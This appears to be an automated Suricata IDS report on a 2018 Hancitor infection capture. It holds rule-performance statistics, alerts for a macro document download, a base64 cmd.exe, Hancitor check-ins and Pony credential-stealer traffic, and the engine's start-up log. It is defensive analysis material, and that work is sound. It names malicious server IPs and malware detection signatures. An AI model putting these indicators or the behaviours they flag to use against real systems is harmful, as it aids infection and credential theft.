Filename: 2018-12-20-Hancitor-1st-run-retreives-Pony-EvilPony-Ursnif-and-SmokeLoader.pcap
Status: Analysis complete
IDS: suricata-4.0.0
Ruleset: etpro-all
Runtime: 22.129983902 seconds
Hash: 53c8dfa5c61083990e65afc5c20decf4
Uploaded: 1553845426

Logfiles


suricata-4.0.0-etpro-all-perf.txt-2019-03-29-T-07-44-08-03292019.0743-2018-12-20-Hancitor-1st-run-retreives-Pony-EvilPony-Ursnif-and-SmokeLoader.pcap.txt - (59862 bytes) - download
  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
  --------------------------------------------------------------------------
  Date: 3/29/2019 -- 07:44:08. Sorted by: max ticks.
  --------------------------------------------------------------------------
   Num      Rule         Gid      Rev      Ticks        %      Checks   Matches  Max Ticks   Avg Ticks   Avg Match   Avg No Match
  -------- ------------ -------- -------- ------------ ------ -------- -------- ----------- ----------- ----------- -------------- 
  1        2820923      1        2        4718337      4.10   13       0        4537117     362949.00   0.00        362949.00  
  2        2809306      1        4        3399842      2.96   50       0        561704      67996.84    0.00        67996.84   
  3        2820158      1        2        8328912      7.25   46       0        522266      181063.30   0.00        181063.30  
  4        2820157      1        2        8052760      7.01   46       0        460111      175060.00   0.00        175060.00  
  5        2811745      1        4        7391337      6.43   29       0        429093      254873.69   0.00        254873.69  
  6        2020865      1        3        3891456      3.39   29       0        379672      134188.14   0.00        134188.14  
  7        2815453      1        4        1032595      0.90   3        0        371732      344198.33   0.00        344198.33  
  8        2819664      1        2        4301627      3.74   26       0        304340      165447.19   0.00        165447.19  
  9        2819930      1        2        4214795      3.67   26       0        297056      162107.50   0.00        162107.50  
  10       2017194      1        3        362868       0.32   2        0        261937      181434.00   0.00        181434.00  
  11       2017195      1        3        360934       0.31   2        0        260960      180467.00   0.00        180467.00  
  12       2819940      1        3        2522865      2.19   15       0        237259      168191.00   0.00        168191.00  
  13       2816510      1        3        2550082      2.22   15       0        236848      170005.47   0.00        170005.47  
  14       2815263      1        3        595723       0.52   4        0        178149      148930.75   0.00        148930.75  
  15       2012520      1        7        170935       0.15   1        1        170935      170935.00   170935.00   0.00       
  16       2018342      1        2        860078       0.75   7        0        141304      122868.29   0.00        122868.29  
  17       2021774      1        2        485006       0.42   5        0        137232      97001.20    0.00        97001.20   
  18       2804907      1        3        523462       0.46   10       0        121569      52346.20    0.00        52346.20   
  19       2816509      1        2        382465       0.33   4        0        112134      95616.25    0.00        95616.25   
  20       2803027      1        6        1116154      0.97   19       0        111519      58744.95    0.00        58744.95   
  21       2816910      1        2        559380       0.49   9        0        107205      62153.33    0.00        62153.33   
  22       2804911      1        3        547086       0.48   8        0        106980      68385.75    0.00        68385.75   
  23       2819939      1        2        380231       0.33   4        0        101409      95057.75    0.00        95057.75   
  24       2801929      1        7        1024748      0.89   19       0        97743       53934.11    0.00        53934.11   
  25       2803657      1        5        422003       0.37   8        0        97371       52750.38    0.00        52750.38   
  26       2816940      1        2        524627       0.46   9        0        93857       58291.89    0.00        58291.89   
  27       2802044      1        4        92811        0.08   1        0        92811       92811.00    0.00        92811.00   
  28       2022303      1        3        112382       0.10   5        1        89265       22476.40    89265.00    5779.25    
  29       2801930      1        7        1009320      0.88   19       0        88452       53122.11    0.00        53122.11   
  30       2821561      1        2        236227       0.21   6        0        87862       39371.17    0.00        39371.17   
  31       2816927      1        3        374889       0.33   9        0        87654       41654.33    0.00        41654.33   
  32       2815254      1        7        292439       0.25   5        0        85300       58487.80    0.00        58487.80   
  33       2802991      1        5        330117       0.29   7        0        84786       47159.57    0.00        47159.57   
  34       2804927      1        2        410523       0.36   10       0        81886       41052.30    0.00        41052.30   
  35       2802987      1        5        907973       0.79   24       0        79873       37832.21    0.00        37832.21   
  36       2802067      1        6        77735        0.07   1        0        77735       77735.00    0.00        77735.00   
  37       2014411      1        11       139733       0.12   2        2        76724       69866.50    69866.50    0.00       
  38       2802043      1        3        74570        0.06   1        0        74570       74570.00    0.00        74570.00   
  39       2020855      1        3        311656       0.27   7        0        74301       44522.29    0.00        44522.29   
  40       2022502      1        4        335671       0.29   8        0        72487       41958.88    0.00        41958.88   
  41       2816669      1        4        173515       0.15   6        0        69644       28919.17    0.00        28919.17   
  42       2811740      1        2        201027       0.17   7        0        69290       28718.14    0.00        28718.14   
  43       2816909      1        2        513879       0.45   9        0        68991       57097.67    0.00        57097.67   
  44       2816931      1        3        313767       0.27   9        0        68707       34863.00    0.00        34863.00   
  45       2804906      1        3        535159       0.47   11       0        67282       48650.82    0.00        48650.82   
  46       2819881      1        2        98391        0.09   2        0        62715       49195.50    0.00        49195.50   
  47       2009702      1        5        160132       0.14   10       0        61309       16013.20    0.00        16013.20   
  48       2025064      1        5        362375       0.32   9        0        61261       40263.89    0.00        40263.89   
  49       2830425      1        1        239666       0.21   5        0        59526       47933.20    0.00        47933.20   
  50       2819978      1        5        59510        0.05   1        1        59510       59510.00    59510.00    0.00       
  51       2022842      1        5        58603        0.05   1        0        58603       58603.00    0.00        58603.00   
  52       2820592      1        3        58506        0.05   1        0        58506       58506.00    0.00        58506.00   
  53       2816895      1        2        57858        0.05   1        0        57858       57858.00    0.00        57858.00   
  54       2816928      1        3        324022       0.28   9        0        57401       36002.44    0.00        36002.44   
  55       2811277      1        7        77696        0.07   2        0        57104       38848.00    0.00        38848.00   
  56       2801861      1        1        123327       0.11   3        0        56671       41109.00    0.00        41109.00   
  57       2022339      1        2        107238       0.09   2        0        56062       53619.00    0.00        53619.00   
  58       2022609      1        2        241085       0.21   6        0        55653       40180.83    0.00        40180.83   
  59       2017552      1        6        3932641      3.42   280      0        55419       14045.15    0.00        14045.15   
  60       2809363      1        3        161069       0.14   3        0        54489       53689.67    0.00        53689.67   
  61       2021418      1        9        134659       0.12   3        0        54317       44886.33    0.00        44886.33   
  62       2810889      1        3        135410       0.12   4        0        53769       33852.50    0.00        33852.50   
  63       2024775      1        1        128446       0.11   27       0        53361       4757.26     0.00        4757.26    
  64       2019094      1        5        160043       0.14   5        0        51799       32008.60    0.00        32008.60   
  65       2816930      1        4        313858       0.27   9        0        51725       34873.11    0.00        34873.11   
  66       2822979      1        3        51665        0.04   1        0        51665       51665.00    0.00        51665.00   
  67       2824971      1        3        93323        0.08   2        0        51225       46661.50    0.00        46661.50   
  68       2820851      1        5        320996       0.28   9        0        50701       35666.22    0.00        35666.22   
  69       2017259      1        12       50613        0.04   1        0        50613       50613.00    0.00        50613.00   
  70       2811276      1        7        50547        0.04   1        0        50547       50547.00    0.00        50547.00   
  71       2816356      1        2        283732       0.25   7        0        50021       40533.14    0.00        40533.14   
  72       2828060      1        4        110593       0.10   3        0        49982       36864.33    0.00        36864.33   
  73       2013250      1        3        49913        0.04   1        0        49913       49913.00    0.00        49913.00   
  74       2816929      1        4        346683       0.30   9        0        49709       38520.33    0.00        38520.33   
  75       2021605      1        4        103783       0.09   4        0        48640       25945.75    0.00        25945.75   
  76       2019141      1        3        189909       0.17   5        0        48622       37981.80    0.00        37981.80   
  77       2821471      1        2        131507       0.11   3        0        48403       43835.67    0.00        43835.67   
  78       2022552      1        2        242036       0.21   10       0        48386       24203.60    0.00        24203.60   
  79       2811275      1        8        48382        0.04   1        0        48382       48382.00    0.00        48382.00   
  80       2820983      1        5        48298        0.04   1        0        48298       48298.00    0.00        48298.00   
  81       2807970      1        8        129514       0.11   3        0        48208       43171.33    0.00        43171.33   
  82       2022901      1        2        131541       0.11   3        0        48185       43847.00    0.00        43847.00   
  83       2016858      1        10       94816        0.08   2        0        47688       47408.00    0.00        47408.00   
  84       2810991      1        4        47644        0.04   1        0        47644       47644.00    0.00        47644.00   
  85       2022503      1        2        82668        0.07   2        0        47475       41334.00    0.00        41334.00   
  86       2826281      1        2        109941       0.10   5        0        47375       21988.20    0.00        21988.20   
  87       2810607      1        8        191482       0.17   5        0        47330       38296.40    0.00        38296.40   
  88       2819790      1        3        81790        0.07   2        0        47304       40895.00    0.00        40895.00   
  89       2024771      1        1        2728566      2.37   505      0        47263       5403.10     0.00        5403.10    
  90       2819993      1        2        46574        0.04   1        0        46574       46574.00    0.00        46574.00   
  91       2023315      1        2        81113        0.07   2        0        46338       40556.50    0.00        40556.50   
  92       2806802      1        2        1793095      1.56   91       0        45960       19704.34    0.00        19704.34   
  93       2815659      1        3        166225       0.14   4        4        45474       41556.25    41556.25    0.00       
  94       2815886      1        2        138309       0.12   4        0        45193       34577.25    0.00        34577.25   
  95       2017748      1        6        636393       0.55   42       0        45143       15152.21    0.00        15152.21   
  96       2802035      1        4        45087        0.04   1        0        45087       45087.00    0.00        45087.00   
  97       2815476      1        6        45073        0.04   1        0        45073       45073.00    0.00        45073.00   
  98       2815477      1        6        44557        0.04   1        0        44557       44557.00    0.00        44557.00   
  99       2018452      1        15       80017        0.07   2        0        44484       40008.50    0.00        40008.50   
  100      2811399      1        2        141563       0.12   4        0        44290       35390.75    0.00        35390.75   
  101      2828122      1        2        79962        0.07   2        0        44233       39981.00    0.00        39981.00   
  102      2821839      1        2        44189        0.04   1        0        44189       44189.00    0.00        44189.00   
  103      2016537      1        2        3822713      3.33   271      0        44062       14105.95    0.00        14105.95   
  104      2815478      1        5        77505        0.07   2        0        44014       38752.50    0.00        38752.50   
  105      2802177      1        3        43997        0.04   1        0        43997       43997.00    0.00        43997.00   
  106      2804157      1        4        43923        0.04   1        0        43923       43923.00    0.00        43923.00   
  107      2816922      1        5        290408       0.25   9        0        43789       32267.56    0.00        32267.56   
  108      2811274      1        7        43682        0.04   1        0        43682       43682.00    0.00        43682.00   
  109      2804921      1        6        43667        0.04   1        1        43667       43667.00    43667.00    0.00       
  110      2816327      1        4        308189       0.27   9        0        43548       34243.22    0.00        34243.22   
  111      2804158      1        3        43388        0.04   1        0        43388       43388.00    0.00        43388.00   
  112      2014380      1        4        132826       0.12   6        0        43190       22137.67    0.00        22137.67   
  113      2025086      1        6        43093        0.04   1        1        43093       43093.00    43093.00    0.00       
  114      2021413      1        2        112999       0.10   3        0        42891       37666.33    0.00        37666.33   
  115      2024767      1        2        77772        0.07   2        0        42428       38886.00    0.00        38886.00   
  116      2815363      1        3        42373        0.04   1        0        42373       42373.00    0.00        42373.00   
  117      2016726      1        6        42342        0.04   1        0        42342       42342.00    0.00        42342.00   
  118      2816525      1        10       300298       0.26   9        0        41601       33366.44    0.00        33366.44   
  119      2824975      1        2        123961       0.11   4        0        41394       30990.25    0.00        30990.25   
  120      2024601      1        2        41290        0.04   1        0        41290       41290.00    0.00        41290.00   
  121      2815475      1        6        41170        0.04   1        0        41170       41170.00    0.00        41170.00   
  122      2827575      1        2        104468       0.09   3        0        41118       34822.67    0.00        34822.67   
  123      2017261      1        3        123072       0.11   3        0        41104       41024.00    0.00        41024.00   
  124      2814883      1        3        40893        0.04   1        0        40893       40893.00    0.00        40893.00   
  125      2824549      1        2        1

This file has been truncated. Go here to download in full.


suricata-4.0.0-etpro-all-alert-2019-03-29-T-07-44-08-03292019.0743-2018-12-20-Hancitor-1st-run-retreives-Pony-EvilPony-Ursnif-and-SmokeLoader.pcap.txt - (2365 bytes) - download
 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12/20/2018-15:22:54.942662  [**] [1:2019837:3] ET WEB_CLIENT SUSPICIOUS Possible Office Doc with Embedded VBA Project (Wide) [**] [Classification: Potentially Bad Traffic] [Priority: 2] {TCP} 47.90.254.148:80 -> 10.12.20.101:49169
12/20/2018-15:22:55.062240  [**] [1:2810419:1] ETPRO CURRENT_EVENTS Inbound cmd.exe Base64 Encoded (ASCII) 1 [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 47.90.254.148:80 -> 10.12.20.101:49169
12/20/2018-15:22:55.229956  [**] [1:2022303:3] ET TROJAN ASCII Executable Inside of MSCOFF File DL Over HTTP [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 47.90.254.148:80 -> 10.12.20.101:49169
12/20/2018-15:25:47.005825  [**] [1:2021997:3] ET POLICY External IP Lookup api.ipify.org [**] [Classification: Potential Corporate Privacy Violation] [Priority: 1] {TCP} 10.12.20.101:49172 -> 54.243.123.39:80
12/20/2018-15:25:48.598795  [**] [1:2819978:5] ETPRO TROJAN Tordal/Hancitor/Chanitor Checkin [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 10.12.20.101:49173 -> 217.23.139.203:80
12/20/2018-15:25:49.015213  [**] [1:2824549:2] ETPRO CURRENT_EVENTS Hancitor encrypted payload Jan 17 (1) [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 45.40.149.34:80 -> 10.12.20.101:49174
12/20/2018-15:25:55.561158  [**] [1:2014411:11] ET TROJAN Fareit/Pony Downloader Checkin 2 [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 10.12.20.101:49175 -> 217.23.139.203:80
12/20/2018-15:25:56.671823  [**] [1:2824549:2] ETPRO CURRENT_EVENTS Hancitor encrypted payload Jan 17 (1) [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 45.40.149.34:80 -> 10.12.20.101:49174
12/20/2018-15:25:56.893770  [**] [1:2824549:2] ETPRO CURRENT_EVENTS Hancitor encrypted payload Jan 17 (1) [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 45.40.149.34:80 -> 10.12.20.101:49174
12/20/2018-15:25:57.045347  [**] [1:2014411:11] ET TROJAN Fareit/Pony Downloader Checkin 2 [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 10.12.20.101:49176 -> 217.23.139.203:80
12/20/2018-15:25:57.264813  [**] [1:2824549:2] ETPRO CURRENT_EVENTS Hancitor encrypted payload Jan 17 (1) [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 45.40.149.34:80 -> 10.12.20.101:49174


suricata-report-2019-03-29-T-07-44-08-03292019.0743-2018-12-20-Hancitor-1st-run-retreives-Pony-EvilPony-Ursnif-and-SmokeLoader.pcap.txt - (17785 bytes) - download
  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
lastcmd:ulimit -c unlimited; /opt/suricata400/bin/suricata -c /opt/suricata400/etc/etpro/suricata400-etpro-all.yaml -l /var/www/html/53c8dfa5c61083990e65afc5c20decf456b33745cb75ec8c950e11a498e082d2 -r /var/pcap/03292019.0743-2018-12-20-Hancitor-1st-run-retreives-Pony-EvilPony-Ursnif-and-SmokeLoader.pcap -vvv -k none
elapsedtime:21.230736
stderr:
stdout:
29/3/2019 -- 07:43:47 - <Info> - Configuration node 'rule-files' redefined.
29/3/2019 -- 07:43:47 - <Notice> - This is Suricata version 4.0.0 RELEASE
29/3/2019 -- 07:43:47 - <Info> - CPUs/cores online: 1
29/3/2019 -- 07:43:47 - <Config> - 'default' server has 'request-body-minimal-inspect-size' set to 34377 and 'request-body-inspect-window' set to 15742 after randomization.
29/3/2019 -- 07:43:47 - <Config> - 'default' server has 'response-body-minimal-inspect-size' set to 33451 and 'response-body-inspect-window' set to 17182 after randomization.
29/3/2019 -- 07:43:47 - <Config> - DNS request flood protection level: 500
29/3/2019 -- 07:43:47 - <Config> - DNS per flow memcap (state-memcap): 524288
29/3/2019 -- 07:43:47 - <Config> - DNS global memcap: 16777216
29/3/2019 -- 07:43:47 - <Config> - allocated 262144 bytes of memory for the host hash... 4096 buckets of size 64
29/3/2019 -- 07:43:47 - <Config> - preallocated 1000 hosts of size 136
29/3/2019 -- 07:43:47 - <Config> - host memory usage: 398144 bytes, maximum: 16777216
29/3/2019 -- 07:43:47 - <Config> - using magic-file /usr/share/file/magic
29/3/2019 -- 07:43:47 - <Config> - Core dump size is unlimited.
29/3/2019 -- 07:43:47 - <Config> - allocated 3670016 bytes of memory for the defrag hash... 65536 buckets of size 56
29/3/2019 -- 07:43:47 - <Config> - preallocated 1000 defrag trackers of size 168
29/3/2019 -- 07:43:47 - <Config> - defrag memory usage: 3838016 bytes, maximum: 33554432
29/3/2019 -- 07:43:47 - <Config> - stream "prealloc-sessions": 2048 (per thread)
29/3/2019 -- 07:43:47 - <Config> - stream "memcap": 33554432
29/3/2019 -- 07:43:47 - <Config> - stream "midstream" session pickups: disabled
29/3/2019 -- 07:43:47 - <Config> - stream "async-oneside": disabled
29/3/2019 -- 07:43:47 - <Config> - stream "checksum-validation": disabled
29/3/2019 -- 07:43:47 - <Config> - stream."inline": disabled
29/3/2019 -- 07:43:47 - <Config> - stream "bypass": disabled
29/3/2019 -- 07:43:47 - <Config> - stream "max-synack-queued": 5
29/3/2019 -- 07:43:47 - <Config> - stream.reassembly "memcap": 134217728
29/3/2019 -- 07:43:47 - <Config> - stream.reassembly "depth": 0
29/3/2019 -- 07:43:47 - <Config> - stream.reassembly "toserver-chunk-size": 2492
29/3/2019 -- 07:43:47 - <Config> - stream.reassembly "toclient-chunk-size": 2462
29/3/2019 -- 07:43:47 - <Config> - stream.reassembly.raw: enabled
29/3/2019 -- 07:43:47 - <Config> - stream.reassembly "segment-prealloc": 2048
29/3/2019 -- 07:43:47 - <Config> - Delayed detect disabled
29/3/2019 -- 07:43:47 - <Config> - pattern matchers: MPM: ac, SPM: bm
29/3/2019 -- 07:43:47 - <Config> - grouping: tcp-whitelist (default) 53, 80, 139, 443, 445, 1433, 3306, 3389, 6666, 6667, 8080
29/3/2019 -- 07:43:47 - <Config> - grouping: udp-whitelist (default) 53, 135, 5060
29/3/2019 -- 07:43:47 - <Config> - prefilter engines: MPM
29/3/2019 -- 07:43:47 - <Config> - IP reputation disabled
29/3/2019 -- 07:43:47 - <Perf> - Registered 148 keyword profiling counters.
29/3/2019 -- 07:43:47 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-ftp.rules
29/3/2019 -- 07:43:47 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-policy.rules
29/3/2019 -- 07:43:47 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-trojan.rules
29/3/2019 -- 07:43:51 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-games.rules
29/3/2019 -- 07:43:51 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-pop3.rules
29/3/2019 -- 07:43:51 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-user_agents.rules
29/3/2019 -- 07:43:51 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-activex.rules
29/3/2019 -- 07:43:52 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-rpc.rules
29/3/2019 -- 07:43:52 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-attack_response.rules
29/3/2019 -- 07:43:52 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-icmp.rules
29/3/2019 -- 07:43:52 - <Config> - No rules loaded from ET-icmp.rules.
29/3/2019 -- 07:43:52 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-scan.rules
29/3/2019 -- 07:43:52 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-voip.rules
29/3/2019 -- 07:43:52 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-chat.rules
29/3/2019 -- 07:43:52 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-icmp_info.rules
29/3/2019 -- 07:43:52 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-info.rules
29/3/2019 -- 07:43:52 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-shellcode.rules
29/3/2019 -- 07:43:52 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-web_client.rules
29/3/2019 -- 07:43:52 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-imap.rules
29/3/2019 -- 07:43:52 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-web_server.rules
29/3/2019 -- 07:43:52 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-current_events.rules
29/3/2019 -- 07:43:55 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-inappropriate.rules
29/3/2019 -- 07:43:55 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-smtp.rules
29/3/2019 -- 07:43:55 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-web_specific_apps.rules
29/3/2019 -- 07:43:56 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-deleted.rules
29/3/2019 -- 07:43:57 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-malware.rules
29/3/2019 -- 07:43:57 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-snmp.rules
29/3/2019 -- 07:43:57 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-worm.rules
29/3/2019 -- 07:43:57 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-dns.rules
29/3/2019 -- 07:43:57 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-misc.rules
29/3/2019 -- 07:43:57 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-sql.rules
29/3/2019 -- 07:43:57 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-dos.rules
29/3/2019 -- 07:43:57 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-netbios.rules
29/3/2019 -- 07:43:57 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-telnet.rules
29/3/2019 -- 07:43:57 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-exploit.rules
29/3/2019 -- 07:43:57 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-p2p.rules
29/3/2019 -- 07:43:57 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-tftp.rules
29/3/2019 -- 07:43:57 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-mobile_malware.rules
29/3/2019 -- 07:43:58 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-botcc.rules
29/3/2019 -- 07:43:59 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-compromised.rules
29/3/2019 -- 07:43:59 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-drop.rules
29/3/2019 -- 07:43:59 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-dshield.rules
29/3/2019 -- 07:43:59 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-tor.rules
29/3/2019 -- 07:43:59 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-ciarmy.rules
29/3/2019 -- 07:43:59 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/local.rules
29/3/2019 -- 07:43:59 - <Config> - No rules loaded from local.rules.
29/3/2019 -- 07:43:59 - <Info> - 44 rule files processed. 39585 rules successfully loaded, 0 rules failed
29/3/2019 -- 07:43:59 - <Info> - Threshold config parsed: 0 rule(s) found
29/3/2019 -- 07:43:59 - <Perf> - using shared mpm ctx' for tcp-packet
29/3/2019 -- 07:43:59 - <Perf> - using shared mpm ctx' for tcp-stream
29/3/2019 -- 07:43:59 - <Perf> - using shared mpm ctx' for udp-packet
29/3/2019 -- 07:43:59 - <Perf> - using shared mpm ctx' for other-ip
29/3/2019 -- 07:43:59 - <Perf> - using shared mpm ctx' for http_uri
29/3/2019 -- 07:43:59 - <Perf> - using shared mpm ctx' for http_request_line
29/3/2019 -- 07:43:59 - <Perf> - using shared mpm ctx' for http_client_body
29/3/2019 -- 07:43:59 - <Perf> - using shared mpm ctx' for http_response_line
29/3/2019 -- 07:43:59 - <Perf> - using shared mpm ctx' for http_header
29/3/2019 -- 07:43:59 - <Perf> - using shared mpm ctx' for http_header
29/3/2019 -- 07:43:59 - <Perf> - using shared mpm ctx' for http_header_names
29/3/2019 -- 07:43:59 - <Perf> - using shared mpm ctx' for http_header_names
29/3/2019 -- 07:43:59 - <Perf> - using shared mpm ctx' for http_accept
29/3/2019 -- 07:43:59 - <Perf> - using shared mpm ctx' for http_accept_enc
29/3/2019 -- 07:43:59 - <Perf> - using shared mpm ctx' for http_accept_lang
29/3/2019 -- 07:43:59 - <Perf> - using shared mpm ctx' for http_referer
29/3/2019 -- 07:43:59 - <Perf> - using shared mpm ctx' for http_connection
29/3/2019 -- 07:43:59 - <Perf> - using shared mpm ctx' for http_content_len
29/3/2019 -- 07:43:59 - <Perf> - using shared mpm ctx' for http_content_len
29/3/2019 -- 07:43:59 - <Perf> - using shared mpm ctx' for http_content_type
29/3/2019 -- 07:43:59 - <Perf> - using shared mpm ctx' for http_content_type
29/3/2019 -- 07:43:59 - <Perf> - using shared mpm ctx' for http_protocol
29/3/2019 -- 07:43:59 - <Perf> - using shared mpm ctx' for http_protocol
29/3/2019 -- 07:43:59 - <Perf> - using shared mpm ctx' for http_start
29/3/2019 -- 07:43:59 - <Perf> - using shared mpm ctx' for http_start
29/3/2019 -- 07:43:59 - <Perf> - using shared mpm ctx' for http_raw_header
29/3/2019 -- 07:43:59 - <Perf> - using shared mpm ctx' for http_raw_header
29/3/2019 -- 07:43:59 - <Perf> - using shared mpm ctx' for http_method
29/3/2019 -- 07:43:59 - <Perf> - using shared mpm ctx' for http_cookie
29/3/2019 -- 07:43:59 - <Perf> - using shared mpm ctx' for http_cookie
29/3/2019 -- 07:43:59 - <Perf> - using shared mpm ctx' for http_raw_uri
29/3/2019 -- 07:43:59 - <Perf> - using shared mpm ctx' for http_user_agent
29/3/2019 -- 07:43:59 - <Perf> - using shared mpm ctx' for http_host
29/3/2019 -- 07:43:59 - <Perf> - using shared mpm ctx' for http_raw_host
29/3/2019 -- 07:43:59 - <Perf> - using shared mpm ctx' for http_stat_msg
29/3/2019 -- 07:43:59 - <Perf> - using shared mpm ctx' for http_stat_code
29/3/2019 -- 07:43:59 - <Perf> - using shared mpm ctx' for dns_query
29/3/2019 -- 07:43:59 - <Perf> - using shared mpm ctx' for tls_sni
29/3/2019 -- 07:43:59 - <Perf> - using shared mpm ctx' for tls_cert_issuer
29/3/2019 -- 07:43:59 - <Perf> - using shared mpm ctx' for tls_cert_subject
29/3/2019 -- 07:43:59 - <Perf> - using shared mpm ctx' for tls_cert_serial
29/3/2019 -- 07:43:59 - <Perf> - using shared mpm ctx' for dce_stub_data
29/3/2019 -- 07:43:59 - <Perf> - using shared mpm ctx' for dce_stub_data
29/3/2019 -- 07:43:59 - <Perf> - using shared mpm ctx' for ssh_protocol
29/3/2019 -- 07:43:59 - <Perf> - using shared mpm ctx' for ssh_protocol
29/3/2019 -- 07:43:59 - <Perf> - using shared mpm ctx' for ssh_software
29/3/2019 -- 07:43:59 - <Perf> - using shared mpm ctx' for ssh_software
29/3/2019 -- 07:43:59 - <Perf> - using shared mpm ctx' for file_data
29/3/2019 -- 07:43:59 - <Perf> - using shared mpm ctx' for file_data
29/3/2019 -- 07:43:59 - <Perf> - using shared mpm ctx' for http_request_line
29/3/2019 -- 07:43:59 - <Perf> - using shared mpm ctx' for http_response_line
29/3/2019 -- 07:43:59 - <Info> - 39590 signatures processed. 1175 are IP-only rules, 15422 are inspecting packet payload, 27448 inspect application layer, 0 are decoder event only
29/3/2019 -- 07:43:59 - <Config> - building signature grouping structure, stage 1: preprocessing rules... complete
29/3/2019 -- 07:43:59 - <Perf> - TCP toserver: 41 port groups, 37 unique SGH's, 4 copies
29/3/2019 -- 07:44:00 - <Perf> - TCP toclient: 21 port groups, 20 unique SGH's, 1 copies
29/3/2019 -- 07:44:00 - <Perf> - UDP toserver: 41 port groups, 27 unique SGH's, 14 copies
29/3/2019 -- 07:44:00 - <Perf> - UDP toclient: 21 port groups, 17 unique SGH's, 4 copies
29/3/2019 -- 07:44:00 - <Perf> - OTHER toserver: 254 proto groups, 3 unique SGH's, 251 copies
29/3/2019 -- 07:44:00 - <Perf> - OTHER toclient: 254 proto groups, 0 unique SGH's, 254 copies
29/3/2019 -- 07:44:04 - <Perf> - Unique rule groups: 104
29/3/2019 -- 07:44:04 - <Perf> - Builtin MPM "toserver TCP packet": 35
29/3/2019 -- 07:44:04 - <Perf> - Builtin MPM "toclient TCP packet": 17
29/3/2019 -- 07:44:04 - <Perf> - Builtin MPM "toserver TCP stream": 33
29/3/2019 -- 07:44:04 - <Perf> - Builtin MPM "toclient TCP stream": 19
29/3/2019 -- 07:44:04 - <Perf> - Builtin MPM "toserver UDP packet": 27
29/3/2019 -- 07:44:04 - <Perf> - Builtin MPM "toclient UDP packet": 17
